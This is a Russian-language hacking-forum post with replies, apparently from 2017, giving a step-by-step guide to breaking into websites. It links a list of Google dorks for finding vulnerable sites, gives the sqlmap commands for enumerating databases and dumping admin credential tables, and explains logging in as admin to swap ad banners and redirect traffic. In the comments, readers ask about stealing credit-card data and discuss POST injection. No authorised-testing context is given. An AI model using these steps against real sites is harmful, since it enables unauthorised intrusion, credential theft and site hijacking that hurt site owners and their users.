Загрузка...
Авторская статья Взламываем сайты за 5 минут [ Kali Linux ]
  1. EvilLovesMe
    EvilLovesMe Автор темы 6 фев 2017 Журналист LZT (нет) 601 17 май 2016
    [IMG]

    всем привет ребята :smilie:

    сегодня я немного расскажу о взломе сайтов на Kali Linux
    Что такое Кали можете узнать в этой >> http://lolzteam.org/threads/28117/ << теме, рекомендую ознакомится
    и так преступим

    Для начала вам нужны сайты с дырами, куда и будет инжектится все, для этого используйте дорки, вот вам в подарок 15к штук

    https://ghostbin.com/paste/bgswc

    После того как получили список сайтов и нашли тот что нужен именно вам, бутимся в кали и бежим открывать Терминал,
    в терминале пишем команду sqlmap -u "ваш cайт" --dbs

    [IMG]

    После проверки и инжекта он выдаст вам что то в этом роде, это база данных

    [IMG]

    После этого открываем нужную БД в виде тэйблов командой sqlmap -u "cайт" -D "ваша база данных" --table

    [IMG]

    Нам выдаст примерно вот такой вот списочек

    [IMG]

    Из этого списка ищем что то с тематикой админки, например

    [IMG]

    Теперь дампим этот тэйбл командой sqlmap -u "cайт" -D "ваша база данных" -T "ваш тейбл" --dump

    [IMG]

    Получаем вот таую вот схему логин пароль статус имя и тд...

    [IMG]

    Это и есть логин и пароль к сайту в качестве Админа.
    Находим страничку логина для админок это обычно например что то такое http://site.com/admin
    хотя в инете куча прог которые сделают это за вас, кому нужно погуглит
    видим такую картину и пытаемся залогинится

    [IMG]

    Вуаля, ваш взломанный сайт готов! :dancing:

    [IMG]

    исходя из того что это за сайт вы можете его использовать по разному, например менять баннеры рекламмы и направлять траффик себе на сайт, страничку, YT и тд.... :boss:

    всем спасибо за внимание, надеюсь будет время писать больше статей на эту тематику :smilie:

    #моястатья
     
    6 фев 2017 Изменено

Комментарии

    1. EvilLovesMe
      EvilLovesMe Автор темы 6 фев 2017 Журналист LZT (нет) 601 17 май 2016
      да, это парсеры по доркам, их куча в нете)
       
    2. EvilLovesMe
      EvilLovesMe Автор темы 6 фев 2017 Журналист LZT (нет) 601 17 май 2016
      работаю только на кали) хз если честно)
       
    3. EvilLovesMe
      EvilLovesMe Автор темы 6 фев 2017 Журналист LZT (нет) 601 17 май 2016
      терминал в Kali linux что то типо командной строки WIN
       
    4. vladislavtk
      vladislavtk 6 фев 2017 82 19 дек 2016
      Все надо будет докачивать так как это не система для пентеста я сам таким страдаю))
       
    5. matyha
      ломанул пентагон
      сяб :3
       
    6. vladislavtk
      vladislavtk 6 фев 2017 82 19 дек 2016
      в виндовс sqli dumper
      ставьте симпы за ответы если помог
       
    7. EvilLovesMe
      EvilLovesMe Автор темы 6 фев 2017 Журналист LZT (нет) 601 17 май 2016
      скинь БД в лс, сяб заранее :3
       
    8. SALCOMP
      SALCOMP 6 фев 2017 Заблокирован(а) 73 14 сен 2016
      Выпрашивание симпатий,но спасибо за помощь,баллов итак дадут
       
    9. EvilLovesMe
      EvilLovesMe Автор темы 6 фев 2017 Журналист LZT (нет) 601 17 май 2016
      лучше Dell) пока не поздно)
       
    10. vladislavtk
      vladislavtk 6 фев 2017 82 19 дек 2016
      А почему бы и нет)
       
    11. vladislavtk
      vladislavtk 6 фев 2017 82 19 дек 2016
      А ты сливаешь цц с сайтов?
       
    12. EvilLovesMe
      EvilLovesMe Автор темы 6 фев 2017 Журналист LZT (нет) 601 17 май 2016
      ЦЦ? может я что то забыла но что это :D
       
    13. vladislavtk
      vladislavtk 6 фев 2017 82 19 дек 2016
      ЦЦ cc creditcard и тд картон или ты таким не занимаешься?
       
    14. spokoinyi_inactive61348
      Эх,я уж думал что то новое для меня(
       
    15. phox
      phox 6 фев 2017 BlueCode inc. 101 9 авг 2016
      Для новичка сойдет. Нужно было ещё написать про **** NetSparker' om и про GET И POST. Могу рассказать.
       
    16. vladislavtk
      vladislavtk 6 фев 2017 82 19 дек 2016
      расскажи о гет и пост
       
    17. phox
      phox 6 фев 2017 BlueCode inc. 101 9 авг 2016
      Когда get ты пишешь sqlmap -u link --dbs
      с постом долго объяснять
       
    18. vladislavtk
      vladislavtk 6 фев 2017 82 19 дек 2016
      обьяснишь завтра в лс? я тему накатаю
       
    19. phox
      phox 6 фев 2017 BlueCode inc. 101 9 авг 2016
      тк легче мне тему сделать :DDD
       
    20. fenommen
      fenommen 7 фев 2017 Заблокирован(а) 60 26 ноя 2014
      делай тему с пост, НУЖНО
       
Top